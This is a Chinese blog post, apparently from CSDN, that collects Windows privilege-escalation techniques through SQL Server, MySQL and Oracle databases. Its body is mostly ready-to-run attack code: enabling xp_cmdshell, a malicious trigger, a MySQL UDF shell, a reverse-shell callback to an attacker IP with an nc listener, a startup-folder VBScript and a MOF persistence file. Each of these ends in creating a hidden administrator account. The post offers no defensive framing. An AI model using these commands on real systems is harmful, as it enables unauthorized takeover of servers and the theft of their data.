windows提权方法收集

最新推荐文章于 2024-05-12 05:59:42 发布
最新推荐文章于 2024-05-12 05:59:42 发布
阅读量888 收藏 2
点赞数
分类专栏: 提权 文章标签: 提权

一、利用数据库提权
1. SQL Server 提权方法
(1) SQL Server 2005添加xp_cmdshell存储过程提权

前提:已经拥有了数据库的sa用户权限
首先运行SQL语句,修改配置重新打开执行操作系统命令的存储过程;

Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

之后,运行语句添加用户,并加入管理员用户组:

Exec master.dbo.xp_cmdshell 'net user test test /add';
Exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';

接下来利用远程终端登录即可。

(2)利用触发器提权
前提:拥有db_owner权限
创建触发器,在向XX_table插入数据以后会执行:

create TRIGGER TR_ROOT ON XX_table
AFTER INSERT
AS
BEGIN
      EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
      EXECUTE MASTER.DBO.XP_CMDSHELL 'NET START TELNET'
      EXECUTE MASTER.DBO.XP_CMDSHELL 'net user test test /add'
      EXECUTE MASTER.DBO.XP_CMDSHELL 'net localgroup administrators test /add'
End

注意:XX_table必须是管理员进行插入操作的表!
————————————————————————————————
2. Mysql提权方法
(1)利用UDF提权
前提:一个低权限的mysql账号,且拥有insert和delete权限,操作系统为Windows,已有文件上传漏洞

将webshell(udf.php)上传到服务器,配置连接数据库,导出UDF.DLL到默认的插件目录下(/lib/plugin),创建shell函数,执行操作系统命令,添加管理用户。

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user test test /add');
select cmdshell('net localgroup administrators test /add');

(2)反弹端口连接提权
前提:无法Getshell,但存在SQL注入漏洞,可以外连,并且已经是root。

首先远程连接mysql数据库:

mysql -h IP -uroot -p
Enter password:
mysql> \. c:\mysql.txt
mysql>selet backshell("yourIP",2222);

本地:

nc -vv -l -p 2222

mysql.txt文件在下方下载:
http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390

(3)添加自启动脚本
前提:拥有File权限
执行以下SQL语句:

mysql>create table backshell (cmd text);
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user test test /add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
mysql>select * from backshell into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp";

想办法让计算机重启。

(4)利用MOF提权
编辑以下代码保存为test.mof,然后导出到%SystemRoot%\System32\Wbem\MOF 文件夹(利用into dumpfile)

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

————————————————————————————————
3. Oracle提权
(1)Oracle 11g利用Java提权
前提:拥有create session权限和所有的Java权限
创建存储过程:

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECTGRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

如果没有创建或者执行存储过程的权限,那么可以直接执行下面的语句:

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:windowssystem32cmd.exe /c dir>c:out.lst’)from dual;

原文地址:https://www.notsosecure.com/hacking-oracle-11g/
——————————————————————————————
参考:
mysql提权总结:http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390
《Web安全之路——渗透技术及实践案例解析》

未完待补充。

9ian1i
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mssql&oracle数据库提权
m0_62207170的博客
03-19 1132
mssql&oracle数据库提权
ORACLE直连数据库注入提权详解.pdf
07-03
ORACLE直连数据库注入提权详解 linux和windows系统直连oracle数据库提权和修复详解
2024年网络安全最新Windows提权方法简单总结_systminfo ,根据系统补丁提权,真的太香了
最新发布
2401_84544780的博客
05-12 981
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
Windows提权之mysql数据库提权(UDF提权)
mrx56的博客
03-31 3100
可通过sqlmap或者msf获取udf文件。
oracle数据库注入提权,Oracle数据库之Oracle 提权笔记
weixin_29268331的博客
04-02 375
本文主要向大家介绍了Oracle数据库之Oracle 提权笔记,通过具体的内容向大家展现,希望对大家学习Oracle数据库有所帮助。PART3代码/命令执行:http://www.tuicool.com/articles/A3Yzaqhttps://www.notsosecure.com/hacking-oracle-11g/犀利的oracle注入技术http://www.jb51....
oracle11g 怎给权限,Oracle11g权限--系统权限
weixin_35223575的博客
04-09 595
用户权限1.权限:数据库中执行某种操作的权力,是预先定义好的,执行某种SQL语句或访问其他用户模式对象的能力。创建一个用户,表示该用户具有了连接和操作数据库的资格,但是要对数据库进行实际操作,则该用户还需要具有相应的操作权限。权限的分类(按照系统管理方式的不同,权限分为两类:系统权限和对象权限)系统权限: 在系统级控制数据库的存取和使用机制。系统级控制决定是否可以连接到数据库,在数据库中可以进行哪...
windows2008提权0day
03-10
Windows 2008 提权0day:深入解析与防范》 Windows 2008操作系统在当时是企业环境中广泛使用的服务器系统,其稳定性和安全性备受信赖。然而,“提权0day”这一概念,意味着存在一个未公开的、未知的安全漏洞,...
提权拿admin.rar
05-06
这个“提权拿admin.rar”压缩包文件显然包含了一个关于如何进行提权操作的教学资源,可能是由网络上收集而来,仅供学习和交流之用,不应用于非法目的。 提权通常分为本地提权和远程提权。本地提权是指攻击者已经...
提权工具包
06-01
例如,它们可能包含Windows的SMB漏洞利用或者Linux的提权脚本。 3. **隐写术与编码技术**:为了隐藏WebShell的存在,工具包可能包含将WebShell编码或嵌入图片的工具,使得常规的安全扫描难以发现。 4. **反检测...
记一次绕过火绒安全提权实战案例1
08-03
绕过火绒安全提权实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器权限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全狗等。为了获取服务器权限,...
内网渗透测试-提权工具
05-25
Windows提权工具有如Meterpreter、Psexec、Empire等。Meterpreter是Metasploit框架的一部分,它提供了一个交互式的会话,允许攻击者执行各种提权模块。Psexec是一个远程执行命令的工具,常用于在系统间获得提升的...
mysql的root权限下提权
02-28
mysql的root权限下提权
ORACLE提权
FIGJAM
03-20 3626
呵呵,今天学校一哥们儿找到我说是有十万火急的事,原来是他的地盘被别人“非法闯入”了,于是去他的网站看了一下,没发现什么能够可以利用的漏洞,并且后台也被他删了,呵呵,正当我在嘲笑他,是人品的问题时,随手用流光扫了一下端口,发现数据库是ORACLE(开了1521端口),于是打开监听器LSNRCTL,然后set current_listener IP连了一下,用version命令看了一下,竟然是orac
Oracle特权提升
liumengcheng的专栏
09-23 626
以下为hack过程 Microsoft Windows [版本 5.2.3790] (C) 版权所有 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator>sqlplus scott/tiger SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月
SQL Server手工注入方式
good good study
01-04 5654
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
windows程序提权方法
sowhat_Ah的专栏
02-04 2万+
Windows下应用程序如果需要做一些系统管理或进程管理之类的工作,经常需要将本进程提权(获取权限令牌); 而通常windows提权方法有两种,主要的方法是: 1)win32API——AdjustTokenPrivileges; 2)ntdll.dll——RtlAdjustPrivilege; 前者是已公开的win32系统API,后者是非公开的导出函数(藏在ntdll.dll里); 两
win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1007
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
mysql提权win_Windows下MySql提权分析
weixin_30861557的博客
01-19 231
写在前面的废话(忽略)这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想总结一下常见的方法思路。基于windows提权姿势多的数不胜数,一般在配置文件可以嗅探到root密码的情况(root密码已知)下,或者注入、爆破拿到root密码下,可以考虑mysql提权。文章内容很基础,下面对这些方法进行一些粗谈!实...
117_Windows 本地特权提升技巧1
08-03
在实际情况中,可能需要结合信息搜集和多种技术来找到最有效的提权途径,而非一味依赖特定的漏洞利用(EXP)。 以上就是针对Windows系统本地权限提升的一些基本技巧,它们是安全研究人员进行渗透测试或恶意攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值